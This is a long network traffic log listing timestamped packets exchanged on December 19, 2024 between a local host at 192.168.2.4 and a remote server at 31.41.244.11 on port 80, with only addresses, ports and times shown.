                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.136059999 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.136059999 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.136225939 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.137052059 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.137149096 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.137284994 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.137737036 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.138199091 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.138287067 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.138318062 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.138880014 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.139394045 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.139429092 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.139974117 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.140373945 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.140475035 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.141556025 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.141608000 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.141644955 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.142209053 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.142643929 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.142771006 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.143291950 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.143718004 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.143789053 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.143850088 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.144821882 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.144872904 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.144932032 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.145365000 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.146001101 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.146055937 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.146084070 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.146128893 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.147089005 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.147187948 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.147339106 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.148163080 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.148288965 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.148385048 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.148385048 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.149285078 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.149378061 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.149379015 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.149763107 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.150358915 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.150516987 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.150768042 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.151592970 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.151628971 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.151922941 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.152659893 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.152936935 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.152993917 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.153708935 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.153911114 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.154108047 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.154777050 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.155117989 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.155179024 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.155328989 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.155981064 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.156017065 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.156076908 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.156076908 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.157124996 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.157159090 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.157286882 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.157674074 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.158113003 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.158201933 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.158210993 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.159220934 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.159291029 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.159367085 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.160047054 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.160342932 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.160413980 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.160470963 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.160628080 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.161475897 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.161541939 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.161602020 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.162004948 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.162594080 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.162684917 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.163662910 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.163767099 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.163795948 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.163991928 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.164822102 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.164875031 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.164943933 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.165992022 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.166028023 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.166199923 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.167105913 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.167140961 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.167217970 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.167217970 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.168174982 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.168209076 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.168265104 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.169209957 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.169327021 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.169414043 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.170355082 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.170417070 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.170435905 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.170528889 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.171446085 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.171514034 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.171595097 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.172435999 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.172549009 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.306509018 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.306536913 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.306600094 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.307041883 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.307123899 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.307179928 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.307251930 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.308156013 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.308410883 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.308443069 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.308511019 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.309345007 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.309371948 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.309401035 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.309438944 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.310370922 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.310496092 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.310575008 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.310723066 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.311477900 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.311568975 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.311597109 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.311789036 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.312691927 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.312767982 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.312813997 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.312855959 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.313705921 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.313770056 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.313818932 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.314039946 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.314824104 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.314878941 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.314971924 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.315905094 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.315957069 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.315973997 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.316054106 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.317087889 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.317166090 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.317190886 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.317256927 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.318130970 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.318198919 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.318242073 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.318883896 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.319233894 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.319282055 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.319329023 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.319477081 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.320327044 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.320466995 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.320549965 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.321468115 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.321716070 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.321892023 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.322679996 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.322767019 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.322799921 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.322861910 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.323694944 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.323710918 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.323740005 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.323756933 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.324796915 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.324960947 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.324994087 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.325097084 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.325884104 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.326008081 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.326077938 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.327003002 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.327138901 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.327193022 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.328103065 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.328212023 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.328231096 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.328610897 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.329240084 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.329368114 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.329461098 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.330328941 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.330418110 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.330554008 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.331464052 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.331500053 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.331521988 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.331727028 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.332549095 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.332648993 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.332724094 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.333647966 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.333823919 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.333978891 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.334789991 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.334906101 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.334942102 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.335122108 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.335897923 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.335913897 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.335942984 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.336029053 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.337057114 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.337135077 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.337162971 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.338097095 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.338107109 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.338208914 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.338231087 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.338376999 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.339220047 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.339292049 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.339330912 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.339369059 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.340379000 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.340539932 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.340573072 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.341018915 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.341398954 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.341540098 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.341677904 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.342597008 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.342641115 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.342816114 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.342816114 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.343631983 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.343657017 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.343689919 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.343728065 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.344744921 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.344875097 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.344908953 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.345110893 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.345841885 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.345978975 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.346035957 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.347027063 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.347044945 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.347150087 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.347196102 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.348151922 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.348166943 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.348217964 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.349217892 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.349271059 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.349473000 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.350265026 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.350347996 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.350383043 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.351368904 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.351433039 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.351464033 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.352046013 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.352487087 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.352638960 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.353676081 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.353729010 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.353739977 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.354670048 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.354913950 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.354962111 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.355839014 CET804986031.41.244.11192.168.2.4
